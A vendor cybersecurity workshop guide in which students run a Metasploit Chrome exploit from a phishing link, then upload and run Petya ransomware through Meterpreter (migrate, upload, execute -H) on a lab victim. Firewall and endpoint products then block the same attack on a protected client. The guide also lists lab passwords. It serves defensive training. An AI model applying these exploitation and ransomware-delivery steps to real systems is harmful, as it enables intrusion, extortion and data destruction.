ULTIMATE
TEST DRIVE
Cybersecurity Portfolio

Workshop Guide

UTD-CP-2.2 © 2022 Palo Alto Networks, Inc. | Confidential and Proprietary 20221123 1
Table of Contents
How to Use This Guide 4
Activity 0 – Initiate the UTD Workshop 5
Task 1 – Log in to Your Ultimate Test Drive Class Environment 5

Task 2 - Understand the UTD Environment Setup 6

Task 3 - Enable Internet Access on the ML-Powered Next-Generation Firewall 7

Task 4 – Install Cortex XDR Agent on Protected Client 8


Activity 1 – Conduct a Ransomware Attack 10
Task 1 - Brief Overview of Ransomware Attack Sequence 10

Task 2 - Check Attacker VM Status 11

Task 3 - Compromise Victim System via Exploit 12

Task 4 - Attacker to Upload and Execute the Ransomware on Victim 13

Task 5 - Execute Ransomware on the Victim Client 15

Task 6 - Test Ransomware on the Protected Client 16


Activity 2 – Protection with the ML-Powered Next-Generation Firewall 18
Task 1 - Review the Port-Based Policy for the Victim 18

Task 2 - Review the Policy for the Protected Client 20

Task 3 - Re-Run the Ransomware on the Protected Client Without URL Filtering 21

Task 4 - Re-Run the Ransomware Attack on the Protected Client 24

Task 5 - Remove the Next-Generation Firewall Protection from the Protected Client 25
Activity 3 - Cortex XDR Detection and Response Platform 27
Task 1 - Review the Cortex XDR Client Console 27

Task 2 – Introduction to Cortex XDR 28

Task 3 – Login and Review Cortex XDR 29


Activity 4 – Introduction to Panorama and Cortex Data Lake 34
Task 1 – Log into Network Security Management: Panorama 34

Task 2 – Forwarding Logs to Cortex Data Lake with Template and Device Object 36

Task 3 – Manage NGFW policies with Device Groups 38


Activity 5 – Introduction to Cortex XSOAR 40
Task 1 – Cortex XSOAR Ecosystem 40

Task 2 – Install and test a new Integration from XSOAR Marketplace 43

Task 3 – Cortex XSOAR Playbook Example 45

Task 4 – Incidents and Playbook 46

Task 5 – Other Cortex XSOAR Resources 49

Activity 6 – Protection for Public Cloud with VM-Series and Prisma Cloud 50
Task 1 – VM-Series ML-Powered Next-Generation Firewall for the Public Cloud 50

Task 2 – Manage and Deploy VM-Series in Public Cloud with Panorama Plugins 52

Task 3 – Resources for VM-Series in Public Cloud 54

Task 4 – Quick Look at Prisma Cloud and Prisma Cloud Compute Edition 55

Task 5 – Monitoring and Control Container Process with Prisma Cloud 59


Activity 7 – Quick Look at Prisma SASE (Secure Access Service Edge) 63
Task 1 – Introduction to Prisma Access 63

Task 2 – Cloud Management for Prisma Access 64

Task 3 – Autonomous Digital Experience Management (ADEM) 67

Task 4 – Prisma SD-WAN 68


Activity 8 - Feedback on Ultimate Test Drive 73
Task 1 – Take the online survey 73

How to Use This Guide
The activities outlined in this Ultimate Test Drive Workshop Guide are meant to contain all the information
necessary to navigate the workshop interface, complete the workshop activities, and troubleshoot any
potential issues with the UTD environment. This guide is meant to be used in conjunction with the
information and guidance provided by your facilitator.

Notes:
This workshop covers only basic topics and is not a substitute for training classes conducted by Palo Alto
Networks Authorized Training Centers. Please contact your partner or regional sales manager for more
information on available training and how to register for one near you.
Unless specified, the Google® Chrome™ web browser will be used to perform any tasks outlined in the
following activities (Chrome is pre-installed on the student desktop of the workshop PC).

Terminology:
Tab refers to the seven tabs along the top of each screen in the GUI.
Node refers to the options associated with each tab, found in the left-hand column of each screen.

Activity 0 – Initiate the UTD Workshop
In this activity, you will:
● Log in to the Ultimate Test Drive Workshop from your laptop.
● Learn the layout of the environment and its various components.
● Enable the firewall to facilitate connectivity.

Task 1 – Log in to Your Ultimate Test Drive Class Environment


Step 1: Verify that your laptop is equipped with a modern browser that supports HTML 5.0. We
recommend using the latest version of Firefox®, Chrome, or Internet Explorer®/Edge®.

Step 2: Open a browser window and navigate to the class URL. If you have an invitation email, you will
find the class URL and passphrase there. Otherwise, your instructor will provide them.

Enter your email address and the class passphrase.

Step 3: Complete the registration form and click Login at the bottom.

Step 4: Once you have logged in, the system will create a unique UTD environment for you. Please note
that this process may take a while, as indicated by the green progress bar at the top of the screen.
Once the environment has been created, the system will display a welcome page.

This will display a list of all virtual systems that constitute the UTD environment.

Take note of the shortcut menu at the top of your browser window. You will use this menu throughout the
workshop to switch between the available desktops. More tabs are available on the right-hand side; click
the right arrow or the three dots to see all the tabs.

Task 2 - Understand the UTD Environment Setup


This UTD environment consists of the following components:
● Security Admin: This is the main workstation for you, the security administrator, which you will
use to modify the settings for different Palo Alto Networks products, including the ML-Powered
Next-Generation Firewall, Cortex XDR management service, Panorama and others.
● Victim: This is a Windows® 10 virtual machine, on which you will carry out the exercises in our
workshop. This virtual machine is protected by neither a firewall nor an endpoint solution. You will use
this system as the victim of the ransomware attacks in our workshop.
● Protected Client: This Windows 10 virtual system is similar to the Victim, but protected by the
Palo Alto Networks products, including the ML-Powered Next-Generation firewall and Cortex
XDR.
● Attacker: This virtual machine is a Kali Linux system that hosts Metasploit®, a penetration testing
tool. You will use this virtual machine to take on the role of the attacker in our workshop
exercises.
● VM-Series (GUI): This is the Palo Alto Networks virtual ML-Powered Next-Generation Firewall.
Review the diagram below to better understand the UTD environment setup.

Task 3 - Enable Internet Access on the ML-Powered Next-Generation Firewall
Step 1: Click the VM-Series GUI tab to open a new tab to the VM-Series Next-Generation firewall GUI.

When you see the warning message Your connection is not private, click Advanced, and then
Proceed to <URL> (unsafe) to bypass the warning message and move on to the login page.

Log in to the firewall with the following name and password:


Name: student
Password: utd135

Close the Welcome message and you will see the Dashboard view.

Step 2: Go to the Network tab and click Interfaces. Note that the Link State of ethernet1/1 is red. Click
on ethernet1/1; you can safely ignore the warning message.

Step 3: Click the Advanced tab. Click the Link State drop-down menu to the right of the dialog box,
select up, then click OK to close the window. Click the Commit button on the top right-hand corner to
open the commit window. Commit All Changes is selected by default, click Commit again to activate the
configuration changes.

Step 4: Once the commit process has completed, you will see that the Link State of ethernet1/1 has
turned green now that the interface is up.

Task 4 – Install Cortex XDR Agent on Protected Client


Step 1: Go back to the Lab browser tab and click the Protected Client tab to access that desktop in
your browser.

Step 2: You should see a PowerShell window open with a command typed in that installs the Cortex XDR
agent. If it is not present, search for powershell in the Windows search bar to open a new PowerShell
window. Then run the following commands:

cd C:\Users\root\Desktop
./Install-Cortex-XDR.ps1

Step 3: The script will download the XDR agent, extract it and install it. During installation, follow through
the installation prompts. This process may take a few minutes.
Step 4: Once completed, double-click the icon in the system tray to bring up the Cortex XDR agent
console. It may take a few minutes for the XDR agent to connect to Cortex XDR.
Step 5: After the installation, open the Cortex XDR agent console from the system tray icon, then click
Check in Now to connect to the XDR server. This allows the newly installed XDR agent to connect to the
Cortex XDR management service.

(Note: XDR version may be different from the screenshot shown above.)

End of Activity 0

Activity 1 – Conduct a Ransomware Attack
In this activity, you will:
● Become the attacker and launch a ransomware attack on the Victim system.
● Experience how the Victim system is compromised through a spear phishing attack.
● Launch a ransomware attack on the Protected Client.

Task 1 - Brief Overview of Ransomware Attack Sequence


A typical ransomware attack involves two main stages:
● Compromise a victim system via exploit.
● Deliver and execute ransomware.
We will conduct a ransomware attack in this activity from both the attacker and victim perspectives. The
attacker hosts a website that delivers an exploit to the victim’s system. When the victim clicks a link in a
phishing email, he or she is redirected to the attacker’s website, where a Google Chrome JSCreate
Side-effect Type Confusion exploit compromises the victim’s system.
Once the victim’s system is compromised, the attacker uploads ransomware to the victim’s machine and
executes it.
This process is depicted in the figure below.

In the next few tasks in this activity, you will play the roles of both the attacker and the victim and see the
ransomware in action.

Task 2 - Check Attacker VM Status
Step 1: Click the Attacker tab to access that desktop in your browser. To log in to the Kali VM, click on the
password field of the VM and then use the CloudShare controls to enter the VM login password: CloudShare
> Keyboard > Send Password.

Once you are logged into the Attacker VM, you will see a terminal window open on the desktop.

Step 2: In the terminal window, type the following command and press the Enter/Return key:
./demo-attack.sh

This will start the exploit program and configure the Attacker VM to listen for incoming connections and
serve the Google Chrome JSCreate Side-effect Type Confusion zero-day exploit to the Victim VM. This
process may take a while, so please be patient.

When configuration is completed, the terminal should display the following prompt:

msf6 exploit(multi/browser/chrome_jscreate_sideeffect)>

The Attacker system is now ready and online, waiting for a connection from the Victim system.

Step 3: Enter sessions into the prompt to list the active sessions:

msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions

There should be no active sessions on the Attacker VM.

Task 3 - Compromise Victim System via Exploit


In this task, you take on the role of the victim. As the victim, you have received a spear phishing email,
which includes a hidden link to the attacker’s listener service. You will click the link, and the VM will be
compromised by the exploit delivered by the attacker’s listener service.
Step 1: Go to the Victim desktop. Click the Victim tab to open the Victim VM.

Microsoft Outlook® will be open and running on the desktop. An email with the subject line “Someone has
your password” is displayed in the preview pane. This looks like a legitimate email from Google, informing
you that someone is trying to access your device. The email suggests you review the device to ensure
your password is safe.

Step 2: Click the Review Your Devices Now link in the email. This will open Google Chrome.

You will be taken to the Gmail login page, where the Google Chrome browser exploit is triggered. (If the
web page appears to still be loading after you see the Gmail page, that is the expected behavior of
the exploit.)
In the next task, you will resume the role of the attacker and continue the next stage of the attack.
Note: When Google Chrome starts, you may see a command prompt pop up; this is expected
behavior. As this is a real-world exploit, a few modifications have been made to ensure that the exploit
works seamlessly in the lab environment with minimal manual steps to enhance the user experience.

Task 4 - Attacker to Upload and Execute the Ransomware on Victim


In this task, you will return to the role of the Attacker and continue the next stage of the attack by
uploading and executing ransomware on the Victim system.
Step 1: Go back to the Attacker VM. You should see Metasploit open a Meterpreter session to the
Victim VM.

Step 2: To verify the session between the Attacker and Victim is open, use the “sessions” command to list
the active sessions (hit Enter/Return to get the command prompt):

msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions

An open session indicates that the Attacker has an active, direct connection to the Victim VM, which can
be used to further compromise the system.
Note the Id of the active session connected to the Victim VM. This is the Session Id you will need to
enter in the next step. It should be session 1.
Note: this number may be different if you refreshed the browser on the Victim VM at any point.

Step 3: Initiate an interactive session with the Victim by entering sessions -i <id> at the Metasploit
prompt. Remember to substitute your Session Id for the number 1 in this command if you have a
different ID number.
msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions -i 1

This will initiate the interactive session, display the message Starting interaction with 1… and change
the prompt to a Meterpreter prompt.

At this point, you have connected to the Victim VM and can execute any number of available commands
to exploit the system. For a list of available commands, type “?” and press Enter/Return at the
Meterpreter prompt (We will not explore the available Meterpreter commands in this exercise.). The
Attacker VM has taken control of the Victim VM at this point.
Step 4: The Attacker VM will now upload the ransomware executable file (happy.exe) to the Victim VM by
first migrating the meterpreter process into explorer.exe. Enter the following command at the prompt:
meterpreter> migrate -N explorer.exe
meterpreter> cd /Temp
meterpreter> dir
meterpreter> upload happy.exe
You should see messages confirming that happy.exe has been successfully uploaded to the Victim VM.
You can enter dir to check that the file has been uploaded.

The Attacker VM is now ready to launch a ransomware attack on the Victim VM.
Note: The Petya ransomware is used in this exercise.

Task 5 - Execute Ransomware on the Victim Client


For this task, you must be prepared to quickly switch over to the browser tab for the Victim VM as soon as
you (as the attacker) have executed the ransomware. This ransomware acts very quickly to infect a
system, and if you remain in the Attacker environment, you will miss some of its actions.
Step 1: In the Attacker terminal window, enter the following command at the Meterpreter prompt (be
prepared to switch to the Victim VM as soon as possible):
meterpreter> execute -f 'cmd.exe /C C:\Temp\happy.exe' -H
Step 2: Quickly switch to the Victim tab. Once the ransomware executes on the Victim VM, it will simulate
a “blue screen of death” that typically accompanies a Windows system crash and reboot the Victim VM.

The ransomware will simulate the process of checking the disk on the Victim VM (the CHKDSK process).
However, the counter that indicates the progress will never stop counting.
Note: If you are connected to the Victim VM via CloudShare RDP, switch over to the CON connection via
the CloudShare controls to view the ransomware causing the BSOD, as the RDP connection is lost when
the Victim VM reboots.
Step 3: Click on the Send Ctrl-Alt-Delete under the Keyboard button on the left side of the Victim VM
window.
The Victim VM will display a flashing, red and gray skull and crossbones image and prompt the user to
PRESS ANY KEY!

Step 4: Click inside the skull and crossbones image and press the spacebar. This should change the
image to a ransomware warning page, with a list of demands and instructions to submit payment in order
to unlock the system.

Congratulations! You are now an attacker and a victim.


You will no longer be able to use this Victim VM for the lab. Next, go back to the Attacker VM.
Step 5: On the Attacker desktop, end the Meterpreter session using the exit command:
meterpreter> exit
Step 6: This will return you to the Metasploit prompt. Execute the sessions command again to see if
there are any other open sessions. You should see none, as the Victim system has been compromised.

Note: Leave the Attacker browser tab open. We will return to it in the next activity.

Task 6 - Test Ransomware on the Protected Client


In this task, we repeat the same attack on the Protected Client VM and see what happens.
Step 1: Click the Protected Client tab. You will see the same email in the Outlook window. Also note the
Cortex XDR window behind it, which we will use in Activity 3.

Step 2: Click the Review Your Devices Now link in the phishing email, as you did on the Victim VM.

You should see a Web Page Blocked message. It looks like the Protected Client is protected against
compromise from the Stage 1 attack. You can also see on the Attacker VM that no session was set up for
exploit delivery.
Note: When Google Chrome starts, you may see a command prompt pop up; this is expected
behavior. As this is a real-world exploit, a few modifications have been made to ensure that the exploit
works seamlessly in the lab environment with minimal manual steps to enhance the user experience.

In the next activity, we will take a closer look at how the next-generation firewall protects the Protected
Client from the Stage 1 attack.

End of Activity 1

Activity 2 – Protection with the ML-Powered Next-Generation Firewall
In this activity, you will:
● Access the firewall and see how it helps to prevent a ransomware attack.
● Learn about the various layers of protections provided by the Palo Alto Networks ML-Powered
Next-Generation firewall.
● Witness Cortex XDR preventing a ransomware attack.

Task 1 - Review the Port-Based Policy for the Victim


In this task, you will access the firewall using the Security Admin VM to review how the ML-Powered
Next-Generation Firewall prevented the first stage of attack on the Protected Client VM in the last activity.
The firewall policies configured in this lab are designed to highlight the traffic between the Victim, Attacker
and Protected Client VMs. Policies for an actual network are likely to be different.
Step 1: Go to the VM-Series GUI tab in your browser. You can log in with student / utd135 again if
needed. Check the URL logs under Monitor > Logs > URL Filtering.
The next few steps will give a quick walkthrough of the next-generation firewall GUI. If this is your first
time using a Palo Alto Networks ML-Powered Next-Generation firewall, you may want to read carefully.
The Dashboard tab widgets show you important information about the firewall, such as the software
version, the operational status of each interface, resource utilization, and more. All the available widgets
are displayed by default, but each administrator can remove and add individual widgets, as needed.

Step 2: Click on the ACC tab. This takes you to the Application Command Center, where you can get a
look at the applications and threats the firewall sees.

The Policies tab is where all firewall policies are configured. There are various types of policies, from
Security policies that configure all firewall rules to NAT or Decryption policies that define other functions
of the next-generation firewall. Feel free to examine the different policy nodes on the left.

Step 3: Click on Security. The first rule, Victim to Attacker, is configured with a port-based firewall rule.
Click on the Victim to Attacker rule to open the Security Policy Rule configuration window. The Source
Address is set to the Victim and the Destination Address is set to the Attacker.

Step 4: The Victim to Attacker policy is a port-based policy because it allows Any application to run on
ports 80, 443 and 8080. Review the Application and Service/URL Category tabs to confirm the policy
configuration.
Ports 80 and 443 are open for HTTP and SSL traffic, while port 8080 is often opened for internal web
servers hosting internal web pages.

Step 5: Go to the Actions tab and note that Profile Setting is set to None, meaning no next-generation
protection is applied to this policy. This explains why the firewall did not provide any protection to the
Victim VM. Close the policy window.

Task 2 - Review the Policy for the Protected Client


Let’s look at the policy for the Protected Client VM and see how it is different.

Step 1: Click on the Protected Client to Attacker policy to open the Security Policy Rule configuration
window. Note that the source address and destination address are set to Protected Client and Attacker.

Step 2: Go to the Application tab. Note that only selected applications (web-browsing, SSL and Flash)
are allowed.

Step 3: Go to the Service/URL Category tab. Note that application-default is selected, so those
applications are only allowed to run on the default ports. Note that you do not need to know which ports
are needed for the applications selected. The Palo Alto Networks ML-Powered Next-Generation Firewall
keeps track of the default port for each application.

Step 4: Go to the Actions tab. Note that protection profiles are configured for Antivirus, Vulnerability
Protection, Anti-Spyware, URL Filtering, Data Filtering and WildFire Analysis. These enable many
protections offered by the firewall.

Step 5: Change the URL Filtering protection to None. Let’s see if disabling URL Filtering will let the
Attacker VM exploit the Protected Client. Click OK to close the policy window.

Step 6: Click the Commit button in the top right-hand corner to confirm the changes. Click Commit again
in the Commit window to activate the configuration changes.

Task 3 - Re-Run the Ransomware on the Protected Client Without URL Filtering

Let’s revisit the phishing email on the Protected Client to see if removing URL Filtering protection will
allow the attacker to exploit the system.

Step 1: Go back to the Protected Client and refresh the Web Page Blocked window or click on the
Review Your Devices Now link in the phishing email again.

This time, the Google page will be allowed to open, which shows that the Protected Client VM is not
protected by URL Filtering. Let’s go to the Attacker VM and see if the exploit succeeds.

Step 2: Go to the Attacker browser tab. Note there is no listener session open. Hit Enter/Return to get
back to the prompt. Enter sessions to see if there are any open sessions. There should be none.

This indicates the Attacker was not successful in exploiting the Protected Client VM.

Step 3: Go back to the VM-Series GUI and review the traffic logs under Monitor > Logs > Traffic. At
the bottom, click Resolve hostname to enable it.

Step 4: Let’s review the traffic logs. Under the Source column, click on Protected Client. This will
populate the search window with the Protected Client VM’s source address. Then, under the Destination
column, click on Attacker to add the Attacker VM’s destination address to the filter.

Step 5: Click on the Apply Filter icon (an arrow pointing to the right) to apply the filter string.

Note that the traffic from the Protected Client VM on port 8080 is blocked by the firewall.

Does this mean all traffic on port 8080 is blocked? Let’s go to the firewall policy and find out.

Step 6: Go to the Policies > Security and look at the Internal-Web-Servers-on-8080 policy. This policy
only allows web browsing applications on port 8080 for all internal web servers supported in the policy.
Since the Attacker VM is not in the Internal-Web-Servers-on-8080 group, traffic from the Protected
Client VM is blocked.
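To make the rulebase logic of this activity concrete, here is a small Python model of the rules reviewed in Tasks 1 and 2 together with the Internal-Web-Servers-on-8080 rule from Step 6. It is an added example, not PAN-OS code and not part of this guide: it shows first-match evaluation with an implicit deny at the end, a port-based rule (Any application on fixed ports, no profiles) next to an application-based rule with application-default and a full profile set, and a log filter that mirrors clicking the Source and Destination cells in Step 4. The rule and address object names come from the guide; the application default-port table, the source of the Internal-Web-Servers-on-8080 rule and the profile attached to it are assumptions constructed for the example.

```python
"""Toy first-match rulebase model for the Activity 2 policy review.

Added illustration, not PAN-OS code: the rule objects, address names and
the default-port table below are constructed for the example and do not
reproduce the firewall's App-ID engine or Applipedia data.
"""
from dataclasses import dataclass, field
from typing import Optional, Set, Union

ANY = None  # selector wildcard, like "any" in a security rule

# Assumed default ports per application (assumption; real values are in Applipedia).
APP_DEFAULT_PORTS = {"web-browsing": {80}, "ssl": {443}, "flash": {80}}


@dataclass(frozen=True)
class Flow:
    src: str      # address object name of the source
    dst: str      # address object name of the destination
    dport: int
    app: str      # application as App-ID would identify it


@dataclass
class Rule:
    name: str
    sources: Optional[Set[str]]
    destinations: Optional[Set[str]]
    applications: Optional[Set[str]]          # ANY = any application (port-based rule)
    service: Union[Set[int], str]             # port set, or "application-default"
    profiles: Set[str] = field(default_factory=set)  # security profiles (Actions tab)
    action: str = "allow"

    def matches(self, flow: Flow) -> bool:
        def sel(selector, value):
            return selector is ANY or value in selector
        if not (sel(self.sources, flow.src) and sel(self.destinations, flow.dst)
                and sel(self.applications, flow.app)):
            return False
        if self.service == "application-default":
            # application-default: the app may only use its own default ports
            return flow.dport in APP_DEFAULT_PORTS.get(flow.app, set())
        return flow.dport in self.service


def evaluate(rules, flow):
    """Return (action, rule name, profiles) for the first matching rule;
    unmatched traffic hits the implicit deny at the end of the rulebase."""
    for rule in rules:
        if rule.matches(flow):
            return rule.action, rule.name, rule.profiles
    return "deny", "interzone-default", set()


def build_rulebase(attacker_in_8080_rule=False):
    """Rulebase as reviewed in Tasks 1-2, optionally with the Task 3 Step 7
    change (Attacker added to the Internal-Web-Servers-on-8080 destinations)."""
    servers = {"Internal-Web-Servers"} | ({"Attacker"} if attacker_in_8080_rule else set())
    return [
        # Port-based rule: Any application on 80/443/8080, no profiles attached
        Rule("Victim to Attacker", {"Victim"}, {"Attacker"}, ANY, {80, 443, 8080}),
        # App-based rule: named apps on their default ports, full profile set
        Rule("Protected Client to Attacker", {"Protected Client"}, {"Attacker"},
             {"web-browsing", "ssl", "flash"}, "application-default",
             {"antivirus", "vulnerability-protection", "anti-spyware",
              "url-filtering", "data-filtering", "wildfire-analysis"}),
        # Web browsing only, to the internal server group, on 8080
        # (source "any" and the profile here are assumptions; the guide only
        # says the rule allows web browsing on 8080 to the internal servers)
        Rule("Internal-Web-Servers-on-8080", ANY, servers, {"web-browsing"}, {8080},
             {"vulnerability-protection"}),
    ]


def traffic_log(rules, flows):
    """Constructed log rows in the spirit of Monitor > Logs > Traffic."""
    rows = []
    for f in flows:
        action, rule, _ = evaluate(rules, f)
        rows.append({"src": f.src, "dst": f.dst, "dport": f.dport,
                     "app": f.app, "rule": rule, "action": action})
    return rows


def filter_log(rows, src=None, dst=None):
    """Equivalent of clicking a Source and a Destination cell to build the filter."""
    return [r for r in rows
            if (src is None or r["src"] == src) and (dst is None or r["dst"] == dst)]


if __name__ == "__main__":
    flows = [  # constructed sample flows
        Flow("Victim", "Attacker", 8080, "unknown-tcp"),
        Flow("Protected Client", "Attacker", 8080, "unknown-tcp"),
        Flow("Protected Client", "Attacker", 8080, "web-browsing"),
        Flow("Protected Client", "Attacker", 443, "ssl"),
    ]
    for row in filter_log(traffic_log(build_rulebase(), flows),
                          src="Protected Client", dst="Attacker"):
        print(row)
```

Running it prints only the Protected Client to Attacker rows. Every flow from the Protected Client on port 8080 lands on the implicit deny, whether App-ID identifies it as web-browsing (application-default restricts it to port 80 in this model) or leaves it unknown, while the same flow from the Victim is allowed by the port-based rule with an empty profile set, which is exactly the difference between Task 1 and Task 2. Building the rulebase with attacker_in_8080_rule=True reproduces Step 7: the flow is now allowed, but still subject to the profile attached to that rule.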

Step 7: Let’s allow the Attacker on this policy and see if we can compromise the Protected Client VM.
Click on the Internal-Web-Servers-on-8080 policy. In the Destination tab, add Attacker to the
Destination Address.

This policy is meant to allow only web browsing on the internal web servers.

Step 8: Click the Commit button in the upper right-hand corner to confirm the changes.

Task 4 - Re-Run the Ransomware Attack on the Protected Client


Now that we have removed a few more layers of protection from the firewall, let’s test the ransomware
attack again.
Step 1: Go back to the Protected Client and refresh the Google login window or click the Review Your
Devices Now link again in the phishing email. You should see the Google login page open again.

Step 2: Go to the Attacker VM and look at the Metasploit terminal. Metasploit will be trying to send the
Chrome exploit, but it will not be able to complete the process.

Step 3: Hit Enter/Return in the Metasploit prompt, then enter the sessions command to look for open
sessions. You should not see any, meaning Metasploit still failed to deliver the Chrome exploit.

Step 4: Go to the Monitor > Logs > Threat to review more about the threat that was detected. You can
see that, once again, the next-generation firewall protected the Protected Client VM from the attack.

Task 5 - Remove the Next-Generation Firewall Protection from the Protected Client
Palo Alto Networks ML-Powered Next-Generation Firewall provides many layers of protection to prevent
attacks. Here are some of the layers applied to the Protected Client VM:
● URL Filtering with inline ML models to block access to the exploit kit URLs.
● Vulnerability protection against exploits.
● Antivirus detection to prevent malware transfer.
● App-ID to explicitly deny unknown TCP port traffic.
We will not go through every layer, but we will disable all next-generation firewall protection by putting the
Protected Client VM to the same port-based policy as the Victim VM.

Step 1: From the VM-Series GUI, go to Policies > Security > Victim-to-Attacker policy > Source tab and
add the Protected Client to this port-based policy.

Step 2: Commit the changes. Once the commit is completed, the Protected Client VM will just have the
same port-based protection as the Victim VM.

Step 3: Go to the Protected Client and refresh the Google page or go to the phishing email and click on
the Review Your Devices Now link again. The webpage will open, but after a moment, you will see a
Cortex XDR notification that a malicious activity has been blocked and Google Chrome will be closed.

Even though you have removed all next-generation firewall protections from the Protected Client VM, it is
still protected by Cortex XDR endpoint protection. We will see how Cortex XDR works to prevent the
ransomware attack on the Protected Client in the next activity.

Before we look at Cortex XDR, feel free to go back to the Attacker VM and check for an open attack
session to the Protected Client VM. Use the sessions command in the Metasploit prompt, and you
should see no open session.

End of Activity 2

Activity 3 - Cortex XDR Detection and Response Platform
In this activity, you will:
● See how Cortex XDR Prevent advanced endpoint protection prevents ransomware attacks.
● Take a quick look at Cortex XDR Pro

Task 1 - Review the Cortex XDR Client Console


In this task, you will access and review the Cortex XDR client on the Protected Client VM.
Step 1: Cortex XDR successfully detected and prevented the Google Chrome exploit session from the
Attacker VM in the last activity. Click OK to close the Cortex XDR Prevention Alert window.

Step 2: If the Cortex XDR client console is not open, double-click the Cortex XDR icon on the Windows
taskbar at the bottom of the desktop. This should display the Cortex XDR client console, which will read
Advanced Endpoint Protection is Enabled.

Note the date and time of the last check-in, indicated in the bottom left of the Cortex XDR client console.
Step 3: Click the Check In Now link to connect to the Cortex XDR management service and retrieve any
updated security policies. These updates are normally done on a set heartbeat schedule.
The link will change momentarily to Connecting. Once the Cortex XDR client has completed the check-in
process, it will return to Check In Now.
Step 4: Go to the Events tab and select the event to see the details about the protection event triggered by
the exploit hosted by the Attacker VM.

Cortex XDR is a lightweight client that is centrally managed by the Cortex XDR management service. We
will review the Cortex XDR web management interface in the next task.

Task 2 – Introduction to Cortex XDR


In this task, we will log in to the Cortex XDR service and review the different types of protections offered
by Cortex XDR. Before we log in to Cortex XDR, here is a quick introduction to Cortex XDR.
Cortex XDR is the world’s first detection and response app that natively integrates network, endpoint and
cloud data to stop sophisticated attacks. Cortex XDR accurately detects threats with behavioral analytics
and reveals the root cause to speed up investigations. Tight integration with enforcement points
accelerates containment, enabling you to stop attacks before the damage is done.
Here is a quick look at Cortex XDR Architecture. Cortex XDR consists of the following components:
Cortex XDR web management - A cloud-based security infrastructure service that is designed to
manage the endpoint security policy, review security events as they occur, and perform additional
analysis of associated logs.
Cortex XDR Agents - Cortex XDR agent enforces your security policy on the endpoint and sends a
report when it detects a threat.
Cortex Data Lake - A cloud-based logging infrastructure that centralizes the collection and storage of
logs generated by the Cortex XDR agents. Cortex Data Lake also supports data collection from Palo Alto
Networks ML-Powered Next-Generation Firewalls and Prisma Access. We will take a closer look at Cortex
Data Lake later in this lab.

In this next task, we will take a quick look at the Cortex XDR web management.

Task 3 – Login and Review Cortex XDR


Step 1: Go to the Cortex XDR tab in the lab, this will open the Cortex login page.

If you see an expired page, click Home under the Keyboard menu on the left to refresh the login
page.

Step 2: Click Next and Sign In on the Single Sign On page to log in with the supplied credentials.

Note: you will be using a Read-Only account.

You can use the Keyboard menu on the left to move forward or back in the browser window. Or click on
the Home icon to get back to the login page.

Once logged into Cortex XDR, you can see at a glance all connected Cortex XDR clients. The
Incident Management Dashboard provides a high-level view of the status of the incidents related to
the Cortex XDR agents managed by your Cortex XDR management service.

Step 3: Cortex XDR provides different Dashboards to give administrators quick access to different
information. We will take a closer look at the incident with the Incident Management Dashboard.

Step 4: Under the Top Incidents (Top 10) in the Incident Management Dashboard, Cortex XDR agents
report security events when the file or process matches your applied policy rules (either default policy
rules or custom rules you define). When the event occurs, Cortex XDR applies the action specified in the
applied security profile, either to block the malicious activity, or allow and report the malicious activity.
The Cortex XDR management service ranks all events in order of severity, so you can quickly and easily
see the most important events when you log in to the Cortex XDR management service. You can then drill
down into the security events to determine if a security event is a real threat and, if so, you can remediate
it. In some cases, you may determine that a security event does not pose a real threat and can create an
exception for it.

Note: In your lab environment, all the VMs are cloned, including the Protected Client. The Cortex XDR
agent is also cloned, and hence all events are shown under the same Endpoint name.
Click on the Behavioral Threat incident of high severity with 2 alerts to review the events recorded when
the Cortex XDR agent identified an attempt to run a malicious file or process. This will bring you to the
details of that event in the Investigation / Incidents section.

Step 5: Go to Incident Response > Incidents, where you can review the details of the selected incident, such
as Key Artifacts, Key Assets and Alerts.

Step 6: Under Key Artifacts, click on the open new page icon under Threat Intelligence to open the
WildFire Analysis report. The screenshots will be different depending on the incident that you have
selected.

Step 7: Palo Alto Networks WildFire is a cloud-delivered malware analysis service that uses data and
threat intelligence from the industry’s largest global community. This incident was triggered by the malware
test file, and you will be able to get more details on this threat. You can use the download button in the
upper left to download a copy of this report. Close the WildFire Analysis Report.

Step 8: Now take a closer look under Alerts; you can learn a great deal from the records displayed in the
Alert table by scrolling to the right of the table. You can see that the incident was triggered by an exploit
against Windows Internet Explorer. This is a good indication to investigate the exploit further and apply the
latest patch or software upgrade if applicable.

Step 9: Cortex XDR provides multiple prevention methods, each of which includes multiple purpose-built
prevention techniques tuned for maximum performance and accuracy.

These malware prevention capabilities include:
● WildFire Inspection and Analysis
● Static Analysis
● Execution Restrictions
● Trusted Publisher Identification
● Admin Override Policies
● Malware Quarantine

You can ask your instructor for an update on the latest prevention capabilities from Cortex XDR.

Step 10: Click Endpoints > Policy Management, then click Profiles in the left navigation tree to view the
security profiles available for Windows, macOS, Linux and Android.

Cortex XDR provides different types of Prevention Profiles that you can use out of the box to begin
protecting your endpoints from threats immediately. While security rules enable you to block or allow files
to run on your endpoints, security profiles help you customize and reuse settings across different groups
of endpoints.

● Exploit – Exploit profiles block attempts to exploit system flaws in browsers, and in the operating
system. Exploit profiles are supported for Windows, Mac, and Linux.
● Malware – Malware profiles protect against the execution of malware including trojans, viruses,
worms, and grayware. Malware profiles are supported for all platforms.
● Restriction – Restriction profiles limit where executables can run on the endpoint. Restriction profiles
are supported for the Windows platform.
● Agent Settings – Agent Settings profiles enable you to customize settings that apply to the Cortex
XDR app such as the disk space quota for log retention.

Step 11: Go to the Policy Rules node to view the assigned Profiles based on operating system type.

Cortex XDR provides out-of-the-box protection for all registered endpoints with a default security
policy for each type of platform. To fine-tune your security policy, you can customize settings in a security
profile and attach that profile to a policy rule.

Note: You are logged into a Cortex Prevent account in this lab activity. In the next task, you will take a
quick look at the Cortex XDR Pro features. However, you won’t see the same content that is in the
screenshots in the Cortex XDR Prevent account that you have logged into.

To learn more about what’s new in Cortex XDR 3.0, please visit the Cortex XDR 3.0 link below.

https://www.paloaltonetworks.com/cortex/cortex-xdr

End of Activity 3

Activity 4 – Introduction to Panorama and Cortex Data Lake
Security deployments are complex and can overload IT teams with complex security rules and
mountains of data from multiple sources. Panorama™ network security management empowers
you with easy-to-implement, consolidated policy creation and centralized management features. 

Palo Alto Networks Cortex Data Lake is a cloud-based offering for context-rich enhanced network
logs generated by our security offerings, including those of our ML-Powered Next-Generation
Firewalls, Prisma Access and Cortex XDR. The Cortex Data Lake is the cornerstone of the Palo
